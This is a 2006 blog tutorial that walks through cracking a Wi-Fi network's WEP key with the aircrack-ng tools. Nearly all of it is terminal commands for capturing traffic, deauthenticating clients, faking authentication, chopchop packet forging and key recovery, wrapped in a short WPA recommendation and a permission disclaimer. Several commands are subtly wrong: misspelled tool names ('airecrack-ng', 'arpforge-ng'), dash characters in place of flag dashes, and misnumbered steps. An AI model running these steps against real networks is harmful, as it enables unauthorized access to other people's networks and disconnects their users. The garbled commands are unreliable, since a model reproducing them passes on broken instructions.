Egurumodblog’s Blog

Cracking WEP: The ultimate guide

posted on August 2nd, 2006

 I told them that that everyone can hack a WEP encrypted network in just a matter of minutes they didn’t believe me… This guide is here for all non-believers. It is possible to crack WEP keys and it’s easy.

If you want to be safe, use at least a WPA encrytion, and if possible with a long and non-dictionary key. Check out the WPA cracking guide to test if your key is safe enough.

##### Preparation #####

1. Download BackTrack (http://www.remote-exploit.org/index.php/BackTrack_Downloads)

2. Install BackTrack to your hd or just boot the live cd (username: root, password: toor; Don’t froget to start the gui: type in startx on the command lien after logging in).

3. Start up a terminal and set your wireless interface in monitor mode.

iwconfig [wireless interface] mode monitor

* to find out what your wireless interface is, type iwconfig and press enter. All interfaces will show up (mine is ath0).

4. Start airodump by typing in the terminal (press enter after typing it in)

airodump-ng –ivs -w capture [wireless interface]

5. When airodump found the network you want to hack it’ll show up. Note the BSSID (acces point’s mac address) and the SSID (the access point’s name). Don’t close this terminal window or stop airodump from running before you have the wep key!

##### Generating data, method one: There are clients visible in airodump associated to the network #####

1. Open a new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –arpreplay -e [the SSID you found with airodump] -b [the BSSID you found wth airodump] -h [the client’s MAC adress]

2. Open another new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –deauth 10 -a [the client’s MAC adress]

3. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.

##### Generating data, method two: There are NO clients visible in airodump associated to the network #####

1. Open a new terminal window and type in (do NOT press the enter button!)

aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06

2. Open another new terminal window and type in (do NOT press the enter button!):

aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06

3. Press enter in the fakeauth terminal and after it started to fakeauth, press enter as quickly as possible in the arpreplay window.

3. Open another new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –deauth 10 -a 01:02:03:04:05:06

4. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.

##### If the above two methods aren’t working, try this #####

1. Open a new terminal window and type in (press the enter button after typing it in):

aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06

2. Open another new terminal window and type in (press the enter button after typing it in):

aireplay-ng [wireless interface] –chopchop -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06

3. The chopchop starts reading packages. When it finds one, it’ll ask you to use it. Choose yes. Wait a few seconds/minutes and remember the filename that is given to you at the end.

4. Open Ethereal (click the icon in the bottom left corner > Backtrack > Sniffers > Ethereal) and open the xor file made with the chopchop attack in Ethereal (it’s located in the home folder)

5. Look with Ethereal in the captured file. Try to find the source ip and the destination ip: write those addresses down somewhere.

6. open a terminal and type in (press enter after typing in):

arpforge-ng [the name of the xor file from the chopchop attack] 1 [the BSSID you found wth airodump] 01:02:03:04:05:06 [the source ip] [the destination ip] arp.cap

7. In a new or in the same terinal window, type in (and press enter):

aireplay-ng -2 ath0 -r arp.cap

5. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.

##### The actual cracking of the WEP key #####

1. Open a new terminal window and type in

airecrack-ng -n 64 capture-01.ivs (for a 64 bits encryption, enter after typing)

or

airecrack-ng -n 128 capture-01.ivs (for a 128 bits encryption, enter after typing)

If you don’t know how strong the encryption is, type in both in different terminals and start a third terminal. Type in this code:

airecrack-ng capture-01.ivs

2. Wait a few minutes. Check the terminal(s). The code will automaticly show up if found. Keep airodump running!

##### Disclaimer #####

I don’t think have to mention that you need written permission from the owner of the network before you are allowed to start cracking his wep or even before you are allowed to capture packages. Just try it with your own network. You’ll learn a lot about it. But never ever try it with another network than your own.